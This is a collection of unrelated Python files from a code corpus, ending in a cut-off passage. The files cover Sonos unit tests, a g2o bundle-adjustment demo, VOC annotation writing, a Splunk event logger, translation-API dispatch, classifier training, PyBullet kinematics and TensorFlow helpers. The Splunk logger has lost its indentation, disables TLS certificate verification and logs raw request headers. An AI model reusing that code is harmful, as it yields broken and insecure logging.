def test_use_case_empty_parameters(connected_device):
    """An empty request should still pause the discovered device and succeed."""
    device_discovery_service = mock.Mock()
    device_discovery_service.get.return_value = connected_device  # We mock the device discovery service
    device_transport_control_service = mock.Mock()
    speaker_interrupt_uc = SpeakerInterruptUseCase(device_discovery_service, device_transport_control_service)
    speaker_interrupt_request = SpeakerInterruptRequestObject.from_dict({})
    result_object = speaker_interrupt_uc.execute(speaker_interrupt_request)
    # The use case must look up a device and pause exactly that device.
    device_discovery_service.get.assert_called()
    device_transport_control_service.pause.assert_called()
    device_transport_control_service.pause.assert_called_with(connected_device)
    # A truthy response object signals success.
    assert bool(result_object) is True
def test_use_case_no_reachable_device():
    """Discovery failure should yield a falsy response carrying the error message."""
    device_discovery_service = mock.Mock()
    device_discovery_service.get.side_effect = NoReachableDeviceException("No reachable Sonos devices")  # We mock the device discovery service
    device_transport_control_service = mock.Mock()
    speaker_interrupt_uc = SpeakerInterruptUseCase(device_discovery_service, device_transport_control_service)
    speaker_interrupt_request = SpeakerInterruptRequestObject()
    result_obj = speaker_interrupt_uc.execute(speaker_interrupt_request)
    # The exception must be converted into a failure response, not raised.
    assert bool(result_obj) is False
    assert result_obj.message == "NoReachableDeviceException: No reachable Sonos devices"
| StarcoderdataPython |
9627937 | <filename>thirdparty/g2opy/python/examples/sba_demo.py
# https://github.com/RainerKuemmerle/g2o/blob/master/g2o/examples/sba/sba_demo.cpp
import numpy as np
import g2o
from collections import defaultdict
import argparse
# Command-line options controlling the synthetic bundle-adjustment experiment.
parser = argparse.ArgumentParser()
parser.add_argument('--noise', dest='pixel_noise', type=float, default=1.,
    help='noise in image pixel space (default: 1.0)')
parser.add_argument('--outlier', dest='outlier_ratio', type=float, default=0.,
    help='probability of spuroius observation (default: 0.0)')
parser.add_argument('--robust', dest='robust_kernel', action='store_true', help='use robust kernel')
parser.add_argument('--dense', action='store_true', help='use dense solver')
parser.add_argument('--seed', type=int, help='random seed', default=0)
args = parser.parse_args()
def main():
    """Run a synthetic stereo bundle-adjustment demo with g2o.

    Generates random 3D points and a line of camera poses, simulates noisy
    (optionally outlier-corrupted) stereo observations, then optimizes the
    resulting graph and reports the RMSE of inlier points before/after.
    """
    # Levenberg-Marquardt over a CSparse-backed SE3 block solver.
    optimizer = g2o.SparseOptimizer()
    solver = g2o.BlockSolverSE3(g2o.LinearSolverCSparseSE3())
    solver = g2o.OptimizationAlgorithmLevenberg(solver)
    optimizer.set_algorithm(solver)
    # 500 random points in a box in front of the cameras.
    true_points = np.hstack([
        np.random.random((500, 1)) * 3 - 1.5,
        np.random.random((500, 1)) - 0.5,
        np.random.random((500, 1)) + 3])
    focal_length = (500, 500)
    principal_point = (320, 240)
    baseline = 0.075
    g2o.VertexSCam.set_cam(*focal_length, *principal_point, baseline)
    true_poses = []
    num_pose = 5
    for i in range(num_pose):
        # pose here transform points from world coordinates to camera coordinates
        pose = g2o.Isometry3d(np.identity(3), [i*0.04-1, 0, 0])
        true_poses.append(pose)
        v_se3 = g2o.VertexSCam()
        v_se3.set_id(i)
        v_se3.set_estimate(pose)
        if i < 2:
            # Fix the first two poses to anchor the gauge freedom.
            v_se3.set_fixed(True)
        v_se3.set_all()
        optimizer.add_vertex(v_se3)
    point_id = num_pose
    inliers = dict()
    sse = defaultdict(float)
    for i, point in enumerate(true_points):
        # Keep only points observed (inside the 640x480 image) by >= 2 poses.
        visible = []
        for j in range(num_pose):
            z = optimizer.vertex(j).map_point(point)
            if 0 <= z[0] < 640 and 0 <= z[1] < 480:
                visible.append((j, z))
        if len(visible) < 2:
            continue
        # Point vertex initialized with noise around the true position.
        vp = g2o.VertexSBAPointXYZ()
        vp.set_id(point_id)
        vp.set_marginalized(True)
        vp.set_estimate(point + np.random.randn(3))
        optimizer.add_vertex(vp)
        inlier = True
        for j, z in visible:
            if np.random.random() < args.outlier_ratio:
                # Replace the measurement with a spurious one.
                inlier = False
                z = np.array([
                    np.random.uniform(64, 640),
                    np.random.uniform(0, 480),
                    np.random.uniform(0, 64)]) # disparity
                z[2] = z[0] - z[2]
            z += np.random.randn(3) * args.pixel_noise * [1, 1, 1/16.]
            edge = g2o.Edge_XYZ_VSC()
            edge.set_vertex(0, vp)
            edge.set_vertex(1, optimizer.vertex(j))
            edge.set_measurement(z)
            edge.set_information(np.identity(3))
            if args.robust_kernel:
                edge.set_robust_kernel(g2o.RobustKernelHuber())
            edge.set_parameter_id(0, 0)
            optimizer.add_edge(edge)
        if inlier:
            inliers[point_id] = i
            error = vp.estimate() - true_points[i]
            sse[0] += np.sum(error**2)
        point_id += 1
    print('Performing full BA:')
    optimizer.initialize_optimization()
    optimizer.set_verbose(True)
    optimizer.optimize(10)
    # Re-measure the error of inlier points after optimization.
    for i in inliers:
        vp = optimizer.vertex(i)
        error = vp.estimate() - true_points[inliers[i]]
        sse[1] += np.sum(error**2)
    print('\nRMSE (inliers only):')
    print('before optimization:', np.sqrt(sse[0] / len(inliers)))
    print('after optimization:', np.sqrt(sse[1] / len(inliers)))
if __name__ == '__main__':
    # Seed only when explicitly requested (0 means "unseeded").
    if args.seed > 0:
        np.random.seed(args.seed)
    main()
| StarcoderdataPython |
4916081 | <gh_stars>0
from tarfile import ENCODING
from xml.etree.ElementTree import Element, SubElement, Comment, tostring
from xml.etree import ElementTree
from xml.dom import minidom
import codecs
def prettify(elem):
    """Return a pretty-printed XML string for the Element."""
    raw_xml = ElementTree.tostring(elem, encoding='unicode')
    return minidom.parseString(raw_xml).toprettyxml(indent=" ")
# Build a Pascal-VOC-style annotation XML for one generated slide image.
size = 1920
name = 'test1'
annotation = Element('annotation')
folder = SubElement(annotation,'folder')
folder.text = 'Slide Generator'
filename = SubElement(annotation,'filename')
filename.text = name + '.jpg'
path = SubElement(annotation,'path')
path.text = "C:\\Users\\François\\Documents\\GitHub\\aicompression\\Slide Generator\\images_generated\\" + name + ".jpg"
source = SubElement(annotation,'source')
database = SubElement(source,"database")
database.text = "Unknown"
size_el = SubElement(annotation,"size")
width_el = SubElement(size_el,"width")
width_el.text = str(size)
height_el = SubElement(size_el,"height")
# TODO(review): height was hard-coded to 2 — looks like a placeholder;
# confirm the real height of the generated images.
height_el.text = str(2)
# Fixed: this element was created with the tag "width" (a duplicate) and the
# image width as its text. Pascal VOC expects a "depth" element holding the
# channel count (3 for RGB).
depth_el = SubElement(size_el,"depth")
depth_el.text = str(3)
# Render once and both write and echo it; the file is closed deterministically.
pretty_xml = prettify(annotation)
with codecs.open(name + '.xml', "w", 'utf-8') as xml_file:
    xml_file.write(pretty_xml)
print(pretty_xml)
1972128 | import datetime
import time
import logging
import json
from uuid import UUID
import os
from django.conf import settings
import requests
from threading import Thread
from .utils import _get_request
class SplunkEvent(object):
_key = None
_timestamp = None
_request = None
_user = None
_auth = None
_start = None
_obj = None
_name = None
_auth_key = "Splunk {0}".format(settings.SPLUNK_TOKEN)
def __init__(self, *args, **kwargs):
if not settings.SPLUNK_LOGS:
return
self._key = kwargs.pop('key', "Generic")
self._timestamp = str(time.time())
self._request = kwargs.pop('request', _get_request())
self._user = kwargs.pop('user', None)
self._name = kwargs.pop('name', None)
self._obj = kwargs.pop('obj', None)
if self._request is not None:
try:
self._auth = self._request.user.is_authenticated()
self._user = self._request.session.get('user_id', None)
except:
self._auth = False
ran_shortcut = self.package_obj(self._obj)
if ran_shortcut:
if settings.SPLUNK_THREAD_EVENTS:
Thread(target=self.send_to_splunk).start()
else:
self.send_to_splunk()
def package_obj(self, obj):
"""
Shortcut method if an object is passed to the init method.
Generally used for objects that have a to_json() method.
"""
if obj is None:
return False
if isinstance(obj, list):
## if it is a list of objects, handle it in self.format()
return True
if 'to_json' in dir(obj):
for k, v in obj.to_json().iteritems():
setattr(self, k, v)
elif isinstance(obj, dict):
for key, value in obj.iteritems():
if type(value) is datetime.datetime:
setattr(self, key, value.strftime('%m/%d/%Y %H:%M:%S'))
elif type(value) is UUID:
setattr(self, key, str(value))
else:
setattr(self, key, value)
else:
for oa in [x for x in obj.__dict__ if not x.startswith('_')]:
if type(getattr(obj, oa)) is datetime.datetime:
setattr(self,
oa,
getattr(obj, oa).strftime('%m/%d/%Y %H:%M:%S'))
elif type(getattr(obj, oa)) is UUID:
setattr(self, oa, str(getattr(obj, oa)))
else:
setattr(self, oa, getattr(obj, oa))
return True
def send_to_splunk(self):
url = settings.SPLUNK_ADDRESS + ":" + \
settings.SPLUNK_EVENT_COLLECTOR_PORT + \
'/services/collector/event'
if settings.SPLUNK_HTTPS:
url = "https://" + url
else:
url = "http://" + url
headers = {'Authorization': self._auth_key}
r = requests.post(url,
headers=headers,
data=json.dumps(self.format()),
verify=False)
if r.status_code > 200:
# logging.error(
# 'error sending splunk event to http collector: {0}'.format(
# r.json()))
# attempt to avoid recursion with the logging handler
print 'error sending splunk event to http collector: {0}'.format(
r.text)
def format_request(self):
""" Format the request to JSON. """
if not self._request:
return {}
else:
data = {
'path': self._request.get_full_path(),
'host': self._request.get_host(),
'GET': self._request.GET,
'method': self._request.method,
'META': {
# 'HTTP_HOST': self._request.META.get('HTTP_HOST', None),
# 'HTTP_REFERER': self._request.META.get('HTTP_REFERER', None),
# 'HTTP_USER_AGENT': self._request.META.get('HTTP_USER_AGENT', None),
# 'HTTP_X_FORWARDED_FOR': self._request.META.get('HTTP_X_FORWARDED_FOR', None),
# 'CLIENT': 'OTHER',
},
}
for k,v in self._request.META.iteritems():
if type(v) == int or type(v) == str:
data['META'][k] = v
if 'is_ios' and 'is_android' in self._request.__dict__:
if self._request.is_ios:
data['META']['CLIENT'] = 'ios'
elif self._request.is_android:
data['META']['CLIENT'] = 'android'
else:
data['META']['CLIENT'] = 'android'
if hasattr(settings, "VERSION"):
data['version'] = settings.VERSION
try:
if self._request.method == "DELETE":
data['DELETE'] = self._request.DELETE
elif self._request.method == "PUT":
data['PUT'] = self._request.PUT
elif self._request.method == "POST":
data['POST'] = self._request.POST
except Exception as e:
pass
return data
    def format(self):
        """ Format the SplunkEvent to JSON.

        Builds the payload dict expected by the Splunk HTTP collector:
        time, sourcetype, and an 'event' dict with the request summary,
        auth/user info, the event name and the serialized event data.
        """
        if isinstance(self._obj, list):
            # list of objects
            event_obj = []
            for o in self._obj:
                item = {}
                if 'to_json' in dir(o):
                    # The object knows how to serialize itself.
                    item = o.to_json()
                elif isinstance(o, dict):
                    item = o
                else:
                    # Fall back to copying public attributes, stringifying
                    # datetimes and UUIDs so the payload stays JSON-safe.
                    for oa in [x for x in o.__dict__ if not x.startswith('_')]:
                        if type(getattr(o, oa)) is datetime.datetime:
                            item[oa] = getattr(o, oa).strftime(
                                '%m/%d/%Y %H:%M:%S')
                        elif type(getattr(o, oa)) is UUID:
                            item[oa] = str(getattr(o, oa))
                        else:
                            item[oa] = getattr(o, oa)
                event_obj.append(item)
        else:
            # Single object: its public attributes were previously copied
            # onto self, so serialize self's public attributes instead.
            event_obj = {}
            for x in [attr for attr in self.__dict__ if not attr.startswith('_')]:
                event_obj[x] = getattr(self, x)
        data = {}
        data['time'] = self._timestamp
        data['sourcetype'] = self._key
        data['event'] = {
            'request': self.format_request(),
            'auth': self._auth,
            'user': self._user,
            'eventData': event_obj,
            'event': self._name,
        }
        return data
    def start_timer(self):
        """ Start a Timer.

        Records the current wall-clock time so a later stop_timer() call
        can compute the elapsed duration.
        """
        self._start = time.time()
def stop_timer(self):
""" Stop the Timer and assign value to object. """
try:
self.execution = int(round((time.time() - self._start)*1000))
except AttributeError:
logging.error('you didnt start the timer!')
| StarcoderdataPython |
1821740 | import api.fanyi as fanyi
# Dispatch table: API category -> vendor name -> query function.
api = {
    'fanyi': {
        'google': fanyi.google_fanyi_query,
        'tencent': fanyi.tencent_fanyi_query,
        'youdao': fanyi.youdao_fanyi_query,
        'baidu': fanyi.baidu_fanyi_query
    }
}
def api_call(action, param):
    """Dispatch *param* to the vendor handler registered under *action*.

    Only the 'fanyi' (translation) action is supported; any other action
    falls through and returns None. `param` must provide 'vender', 'q',
    'from' and 'to' keys.
    """
    if action != 'fanyi':
        return None
    handler = api[action][param['vender']]
    return handler(param['q'], param['from'], param['to'])
| StarcoderdataPython |
3545047 | import numpy as np
import matplotlib.pyplot as plt
import os, random
import json
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms, models
from collections import OrderedDict
from PIL import Image
import time
import matplotlib.image as mp
import argparse
import essentials
# Command-line interface for training the flower image classifier.
p = argparse.ArgumentParser()
p.add_argument('--data_dir', type=str, default='ImageClassifier/flowers')
# NOTE(review): store_true with default='cuda' means arg.gpu is the string
# 'cuda' when the flag is absent and True when present -- confirm the
# essentials helpers handle both values.
p.add_argument('--gpu', action='store_true', default='cuda')
p.add_argument('--epochs', type=int, default=2)
p.add_argument('--arch', type=str,default='vgg16')
p.add_argument('--learning_rate', type=float, default=0.001)
p.add_argument('--checkpoint', type=str)
# NOTE(review): type=float cannot parse a loss module from the command
# line; this option only works when left at its default (nn.NLLLoss()).
p.add_argument('--criterion', type=float, default=nn.NLLLoss())
p.add_argument('--save_file', type=str, default='classifier.pth')
p.add_argument('--hiddenlayer1',type=int,default=4096)
p.add_argument('--hiddenlayer2', type=int,default=102)
arg = p.parse_args()
# Build data loaders, then construct/load the model and train/evaluate it.
train_loader,test_loader,valid_loader = essentials.data_loader(arg)
# NOTE(review): the freshly built model is immediately replaced by the one
# returned from model_loader -- the first call may be redundant.
model = essentials.model(arg.arch,arg.hiddenlayer1,arg.hiddenlayer2)
model = essentials.model_loader(arg.save_file,arg.hiddenlayer1,arg.hiddenlayer2,arg.arch)
optimizer = optim.Adam(model.classifier.parameters(), lr=arg.learning_rate)
model = essentials.model_trainer(model,arg.epochs,train_loader,valid_loader,arg.criterion,optimizer, arg.gpu)
essentials.model_tester(train_loader,model, arg.gpu)
checkpoint = essentials.save(model,arg)
| StarcoderdataPython |
6434111 | # Third party code
#
# The following code are copied or modified from:
# https://github.com/google-research/motion_imitation
"""The inverse kinematic utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import typing
_IDENTITY_ORIENTATION = (0, 0, 0, 1)
def joint_angles_from_link_position(
    robot: typing.Any,
    link_position: typing.Sequence[float],
    link_id: int,
    joint_ids: typing.Sequence[int],
    base_translation: typing.Sequence[float] = (0, 0, 0),
    base_rotation: typing.Sequence[float] = (0, 0, 0, 1)):
    """Solve IK for the joint angles that place a link at a target position.

    Args:
        robot: A robot instance.
        link_position: Target (x, y, z) of the link in the body frame; the
            frame is offset from the COM frame by base_translation and
            base_rotation.
        link_id: The link id as returned from loadURDF.
        joint_ids: Positional indices of the joints of interest (these can
            differ from the joint unique ids).
        base_translation: Additional base translation.
        base_rotation: Additional base rotation.

    Returns:
        A list with the angle of each requested joint.
    """
    client = robot.pybullet_client
    # Offset the COM frame by the requested translation/rotation.
    com_pos, com_orn = robot.GetBasePosition(), robot.GetBaseOrientation()
    frame_pos, frame_orn = client.multiplyTransforms(
        com_pos, com_orn, base_translation, base_rotation)
    # Express the target link position in world coordinates.
    target_world, _ = client.multiplyTransforms(
        frame_pos, frame_orn, link_position, _IDENTITY_ORIENTATION)
    all_angles = client.calculateInverseKinematics(
        robot.quadruped, link_id, target_world, solver=0)
    # Keep only the joints the caller asked for.
    return [all_angles[i] for i in joint_ids]
def link_position_in_base_frame(
    robot: typing.Any,
    link_id: int,
):
    """Return a link's position expressed in the robot's base frame.

    Args:
        robot: A robot instance.
        link_id: The link whose relative position is computed.

    Returns:
        np.ndarray with the (x, y, z) position of the link relative to
        the base.
    """
    client = robot.pybullet_client
    inv_pos, inv_orn = client.invertTransform(
        robot.GetBasePosition(), robot.GetBaseOrientation())
    world_pos = client.getLinkState(robot.quadruped, link_id)[0]
    local_pos, _ = client.multiplyTransforms(
        inv_pos, inv_orn, world_pos, (0, 0, 0, 1))
    return np.array(local_pos)
def compute_jacobian(
    robot: typing.Any,
    link_id: int,
):
    """Return the translational Jacobian of a link as a 3 x N matrix.

    N is the robot's total DoF count. For a quadruped the first 6 columns
    correspond to COM translation/rotation, and leg `leg_id`'s columns are
    [6 + leg_id * 3 : 6 + leg_id * 3 + 3].

    Args:
        robot: A robot instance.
        link_id: The link id as returned from loadURDF.

    Returns:
        The 3 x N Jacobian as an np.ndarray.
    """
    joint_positions = [state[0] for state in robot.joint_states]
    zeros = [0] * len(joint_positions)
    translational, _ = robot.pybullet_client.calculateJacobian(
        robot.quadruped, link_id, (0, 0, 0), joint_positions, zeros, zeros)
    return np.array(translational)
| StarcoderdataPython |
8160585 | #coding=utf-8
import tensorflow as tf
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python import pywrap_tensorflow
import wml_utils as wmlu
import os
import numpy as np
import logging
import wsummary
import basic_tftools as btf
from tfop import set_value
# Graph-collection key used to register hash tables created by this module.
_HASH_TABLE_COLLECTION = "HASH_TABLE"
# Per-channel RGB mean used by some preprocessing pipelines (see mean_pixel).
_MEAN_RGB = [123.15, 115.90, 103.06]
# Re-exported aliases: kept so callers that import these helpers from this
# module (instead of btf/wsummary directly) keep working.
isSingleValueTensor = btf.isSingleValueTensor
static_or_dynamic_map_fn = btf.static_or_dynamic_map_fn
variable_summaries = wsummary.variable_summaries
variable_summaries_v2 = wsummary.variable_summaries_v2
histogram = wsummary.histogram
histogram_or_scalar = wsummary.histogram_or_scalar
image_summaries = wsummary.image_summaries
_draw_text_on_image = wsummary._draw_text_on_image
image_summaries_with_label = wsummary.image_summaries_with_label
row_image_summaries = wsummary.row_image_summaries
combined_static_and_dynamic_shape = btf.combined_static_and_dynamic_shape
batch_gather = btf.batch_gather
show_return_shape = btf.show_return_shape
add_name_scope = btf.add_name_scope
add_variable_scope = btf.add_variable_scope
probability_case = btf.probability_case
indices_to_dense_vector = btf.indices_to_dense_vector
PrintSummary = btf.PrintSummary
PrintSummaryV2 = btf.PrintSummaryV2
PrintNaNorInf = btf.PrintNaNorInf
def add_to_hash_table_collection(value):
    """Register *value* in this module's hash-table graph collection."""
    tf.add_to_collection(_HASH_TABLE_COLLECTION, value)

def get_hash_table_collection():
    """Return every value registered in the hash-table graph collection."""
    return tf.get_collection(_HASH_TABLE_COLLECTION)
def parameterNum(argus):
    """Return the total number of scalar parameters in a set of variables.

    Args:
        argus: an iterable of variables (anything exposing
            get_shape().as_list()), or a dict whose values are such
            variables.

    Returns:
        The sum over all variables of the product of their dimensions.
    """
    # FIX: removed a leftover debug statement `print(type(argus))`.
    if isinstance(argus, dict):
        argus = argus.values()
    num = 0
    for argu in argus:
        dim = 1
        for v in argu.get_shape().as_list():
            dim *= v
        num += dim
    return num
def show_values(values, name=None, fn=print):
    """Render each value on its own line and hand the text to *fn*.

    When *name* is given it becomes the first line of the output.
    """
    parts = [] if name is None else [name + "\n"]
    parts.extend(str(v) + "\n" for v in values)
    fn("".join(parts))
def show_values_name(values, name=None, fn=print):
    """Render each value's `.name` on its own line and hand the text to *fn*.

    When *name* is given it becomes the first line of the output.
    """
    parts = [] if name is None else [name + "\n"]
    parts.extend(str(v.name) + "\n" for v in values)
    fn("".join(parts))
def gather_in_axis_with_one_dim_indices(data,indices,axis=0):
    '''
    :param data: a tensor with more than one dims
    :param indices: one dim indices
    :param axis: axis to gather along
    :return: data reordered along `axis` by `indices`

    example:
    data = [[1,3,2],[9,8,7]]
    indices = [1,2,0]
    res = [[3,2,1],[8,7,9]]
    '''
    # BUG FIX: the original asserted data.get_shape().ndims <= 1, which
    # contradicts the documented contract (data has more than one dim) and
    # rejected every valid call; the rank guard belongs on `indices`.
    assert indices.get_shape().ndims <= 1, "error indices dim."
    if axis == 0:
        return tf.gather(data, indices)
    indices = tf.reshape(indices, [-1])
    # Swap `axis` with dim 0, gather, then swap back.
    # BUG FIX: range() is not index-assignable in Python 3; build a list.
    perm = list(range(len(data.get_shape().as_list())))
    perm[0] = axis
    perm[axis] = 0
    data = tf.transpose(data, perm=perm)
    data = tf.gather(data, indices)
    data = tf.transpose(data, perm)
    return data
def gather_in_axis_with_two_dim_indices(data,indices,axis=0):
    '''
    :param data: [batch_size,...], a tensor with more than one dims.
    :param indices: [batch_size,X], indices with exactly two dims.
    :param axis: axis to gather along

    example:
    data = [[1,3,2],[7,8,9]]
    indices = [[1,2,0],[2,1,0]]
    res = [[3,2,1],[9,8,7]]
    '''
    assert indices.get_shape().ndims ==2, "error indices dim."
    if axis == 0:
        return tf.gather(data, indices)
    if axis==1:
        data = tf.map_fn(lambda x:tf.gather(x[0],x[1]), elems=(data,indices),dtype=(data.dtype))
    else:
        # Swap `axis` with dim 1, gather per batch row, then swap back.
        # BUG FIX: range() is not index-assignable in Python 3; build a list.
        perm = list(range(len(data.get_shape().as_list())))
        perm[1] = axis
        perm[axis] = 1
        data = tf.transpose(data, perm=perm)
        data = tf.map_fn(lambda x:tf.gather(x[0],x[1]), elems=(data,indices),dtype=(data.dtype))
        data = tf.transpose(data, perm)
    return data
def gather_in_axis(data,indices,axis=0):
    """Gather `data` along `axis` using 1-D or batched 2-D indices.

    Dispatches on the rank of `indices`; axis 0 is a plain tf.gather.
    (FIX: removed an unreachable trailing `return data`.)
    """
    if axis == 0:
        return tf.gather(data, indices)
    if indices.get_shape().ndims <= 1:
        return gather_in_axis_with_one_dim_indices(data, indices, axis)
    return gather_in_axis_with_two_dim_indices(data, indices, axis)
'''
'''
def apply_with_random_selector(x, func, num_cases):
    """Apply func(x, case) for one uniformly random case in [0, num_cases).

    `func` is wired into the graph once per case via switch/merge, but only
    the randomly selected branch receives a usable tensor at run time.
    """
    sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)
    '''
    只有当case==sel时func才会收到一个可用的tensor
    merge返回一个available tensor和index
    '''
    # (translation) only the branch where case == sel receives a usable
    # tensor; merge returns the available tensor and its index.
    return control_flow_ops.merge([
        func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)
        for case in range(num_cases)])[0]
def random_select_tensors(tensors):
    """Uniformly pick one tensor from *tensors* at graph-execution time."""
    choice = tf.random_uniform([], maxval=len(tensors), dtype=tf.int32)
    branches = [control_flow_ops.switch(t, tf.equal(choice, i))[1]
                for i, t in enumerate(tensors)]
    return control_flow_ops.merge(branches)[0]
def _ImageDimensions(image):
    """Return [height, width, channels] of a rank-3 image.

    Statically known dimensions come back as python ints; unknown ones fall
    back to dynamic shape tensors.
    """
    if image.get_shape().is_fully_defined():
        return image.get_shape().as_list()
    static = image.get_shape().with_rank(3).as_list()
    dynamic = array_ops.unstack(array_ops.shape(image), 3)
    return [st if st is not None else dyn
            for st, dyn in zip(static, dynamic)]
def resize_image(image, size,
                 method=tf.image.ResizeMethod.BILINEAR,
                 align_corners=False):
    """Resize a single [H, W, C] image to `size`, preserving rank 3."""
    with tf.name_scope('resize_image'):
        height, width, channels = _ImageDimensions(image)
        batched = tf.expand_dims(image, 0)
        resized = tf.image.resize_images(batched, size, method, align_corners)
        return tf.reshape(resized, tf.stack([size[0], size[1], channels]))
def reshape_list(l, shape=None):
    """Flatten or regroup a list.

    With shape=None, nested lists/tuples in `l` are flattened one level.
    Otherwise `shape` gives consecutive group sizes: a size of 1 yields the
    bare element, anything else yields a sub-list of that many elements.
    """
    if shape is None:
        flat = []
        for item in l:
            if isinstance(item, (list, tuple)):
                flat.extend(item)
            else:
                flat.append(item)
        return flat
    grouped = []
    pos = 0
    for s in shape:
        if s == 1:
            grouped.append(l[pos])
        else:
            grouped.append(l[pos:pos + s])
        pos += s
    return grouped
'''
将var作为图像记录
var:[batch_size,X]
'''
def scale_image_summaries(var, name, max_outputs=3, heigh=None):
    """Record a [batch_size, X] tensor as an image summary.

    Each row is stretched vertically (nearest neighbour) to `heigh` pixels;
    by default a third of the row width.
    """
    width = var.get_shape().as_list()[-1]
    if heigh is None:
        heigh = width / 3
    img = tf.expand_dims(tf.expand_dims(var, axis=1), axis=3)
    img = tf.image.resize_nearest_neighbor(img, size=[heigh, width])
    tf.summary.image(name, img, max_outputs=max_outputs)
def top_k_mask_nd(value,k=1):
    """Boolean mask of the top-k entries along the last axis (rank >= 2).

    Returns:
        (mask, indices): mask has `value`'s shape with True at the top-k
        positions of each last-axis row; indices has shape
        value.shape[:-1] + [k] with those positions sorted ascending.
    """
    assert value.shape.ndims>1, "error dim size"
    shape = btf.combined_static_and_dynamic_shape(value)
    # Collapse all leading axes into a single batch dimension N.
    N = 1
    for i in range(len(shape)-1):
        N = N*shape[i]
    value = tf.reshape(value,[N,shape[-1]])
    values, indics = tf.nn.top_k(value, k)
    # top_k over the negated indices sorts the selected positions ascending.
    indics, _ = tf.nn.top_k(-indics, k)
    indics1 = -indics
    # Build [row, col] pairs and scatter them into a dense boolean mask.
    indics0 = tf.reshape(tf.range(N),[N,1])
    indics0 = tf.tile(indics0,[1,k])
    indics = tf.reshape(indics1,[-1,1])
    indics0 = tf.reshape(indics0,[-1,1])
    indics = tf.concat([indics0,indics],axis=1)
    res = tf.cast(tf.sparse_to_dense(indics,[N,shape[-1]], 1), tf.bool)
    res = tf.reshape(res,shape)
    indics1 = tf.reshape(indics1,shape[:-1]+[k])
    return res,indics1
def top_k_mask_1d(value,k=1):
    """Boolean mask of the top-k entries of a rank-1 tensor.

    Returns:
        (mask, indices): mask has `value`'s shape; indices are the selected
        positions sorted ascending.
    """
    assert value.shape.ndims==1, "error dim size"
    values, indics = tf.nn.top_k(value, k)
    # Sort the selected positions ascending via top_k on their negation.
    indics, _ = tf.nn.top_k(-indics, k)
    indics = -indics
    shape = btf.combined_static_and_dynamic_shape(value)
    res = tf.cast(tf.sparse_to_dense(indics, shape, 1), tf.bool)
    return res,indics
def top_k_mask(value,k=1,shape=None,return_indices=False):
    """Boolean mask of the k largest entries of `value` (last axis).

    Dispatches to the rank-1 or rank-N implementation, optionally reshapes
    the mask to `shape`, and optionally also returns the selected indices.
    """
    with tf.name_scope("top_k_mask"):
        impl = top_k_mask_1d if value.shape.ndims == 1 else top_k_mask_nd
        mask, indices = impl(value, k=k)
        if shape is not None:
            mask = tf.reshape(mask, shape)
        return (mask, indices) if return_indices else mask
def random_top_k_mask_nd(value,k=3,nr=1):
    """Randomly keep `nr` of the top-`k` entries along the last axis (rank >= 2).

    Returns:
        (mask, indices): boolean mask shaped like `value`, and the kept
        positions (sorted ascending) flattened over the leading axes.
    """
    assert value.shape.ndims>1, "error dim size"
    shape = btf.combined_static_and_dynamic_shape(value)
    # Collapse all leading axes into a single batch dimension N.
    N = 1
    for i in range(len(shape)-1):
        N = N*shape[i]
    value = tf.reshape(value,[N,shape[-1]])
    values, indics = tf.nn.top_k(value, k)
    # Shuffle the k candidate columns and keep the first nr of them.
    indics = tf.transpose(indics)
    indics = tf.random_shuffle(indics)
    indics = indics[:nr,:]
    indics = tf.transpose(indics)
    # Sort the surviving positions ascending.
    indics, _ = tf.nn.top_k(-indics, nr)
    indics1 = -indics
    # Build [row, col] pairs and scatter them into a dense boolean mask.
    indics0 = tf.reshape(tf.range(N),[N,1])
    indics0 = tf.tile(indics0,[1,nr])
    indics = tf.reshape(indics1,[-1,1])
    indics0 = tf.reshape(indics0,[-1,1])
    indics = tf.concat([indics0,indics],axis=1)
    res = tf.cast(tf.sparse_to_dense(indics,[N,shape[-1]], 1), tf.bool)
    res = tf.reshape(res,shape)
    return res,indics1
def random_top_k_mask_1d(value,k=3,nr=1):
    """Randomly keep `nr` of the top-`k` entries of a rank-1 tensor.

    Returns:
        (mask, indices) with the kept positions sorted ascending.
    """
    assert value.shape.ndims==1, "error dim size"
    values, indics = tf.nn.top_k(value, k)
    # Shuffle the k candidates and keep the first nr.
    indics = tf.random_shuffle(indics)
    indics = indics[:nr]
    # Sort the kept positions ascending.
    indics, _ = tf.nn.top_k(-indics, nr)
    indics = -indics
    res = tf.cast(tf.sparse_to_dense(indics, value.shape, 1), tf.bool)
    return res,indics
'''
从value中选出得分最高的k个,再从k个中随机选nr个返回
'''
def random_top_k_mask(value,k=3,nr=1,shape=None,return_indices=False):
    """Select the top-k scores of `value`, then randomly keep nr of them.

    Dispatches to the rank-1 or rank-N implementation, optionally reshapes
    the mask to `shape`, and optionally also returns the kept indices.
    """
    with tf.name_scope("top_k_mask"):
        impl = (random_top_k_mask_1d if value.shape.ndims == 1
                else random_top_k_mask_nd)
        mask, indices = impl(value, k=k, nr=nr)
        if shape is not None:
            mask = tf.reshape(mask, shape)
        return (mask, indices) if return_indices else mask
def bottom_k_mask(value, k=1,shape=None):
    """Boolean mask of the k smallest entries of `value` (last axis)."""
    negated = -value
    return top_k_mask(negated, k, shape)
'''
根据index指定的值在x的第二维中选择数据
index: (Y)
x:(Y,M,N,...)
return:
x:(Y,N,...)
'''
def select_2thdata_by_index(x,index):
    """Select one slice along x's second axis per entry of the first axis.

    x: (Y, M, N, ...); index: (Y) with values in [0, M).
    Returns: (Y, N, ...) where result[i] == x[i, index[i]].
    Falls back to the v2 implementation when static shapes are unknown.
    """
    if not isinstance(x,tf.Tensor):
        x = tf.convert_to_tensor(x)
    if not isinstance(index,tf.Tensor):
        index = tf.convert_to_tensor(index)
    if not x.get_shape().is_fully_defined() or not index.get_shape().is_fully_defined():
        return select_2thdata_by_index_v2(x,index)
    d_shape = index.get_shape().as_list()
    x_2th_size = x.get_shape().as_list()[1]
    # Pair each row id with its column index, scatter into a dense one-hot
    # mask over (Y, M), then pull the selected slices with boolean_mask.
    range = tf.range(0, d_shape[0],dtype=tf.int32)
    range = tf.expand_dims(range, axis=1)
    index = tf.expand_dims(index, axis=1)
    if index.dtype is not tf.int32:
        index = tf.cast(index,tf.int32)
    d_masks = tf.concat(values=[range, index], axis=1)
    d_masks = tf.sparse_to_dense(d_masks, [d_shape[0], x_2th_size], 1)
